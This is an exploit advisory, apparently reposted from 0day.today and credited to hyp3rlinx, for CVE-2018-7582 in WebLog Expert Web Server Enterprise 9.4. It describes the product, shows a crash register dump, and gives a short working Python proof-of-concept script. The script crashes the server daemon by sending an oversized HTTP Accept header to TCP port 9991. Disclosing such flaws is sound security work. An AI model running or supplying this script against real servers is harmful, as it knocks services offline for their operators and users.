Exploit for windows platform in category dos / poc
[+] Credits: John Page (aka hyp3rlinx)
Vendor:
=======
www.weblogexpert.com
Product:
=========
WebLog Expert Web Server Enterprise v9.4
WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2018-7582
Security Issue:
================
WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991.
(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404 add esp,4
Exploit/POC:
=============
import socket
print 'Weblog Expert Server / Denial Of Service'
print 'hyp3rlinx'
IP='Weblog Expert Server IP'
PORT=9991
PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(PAYLOAD)
s.close()
# 0day.today [2018-03-20] #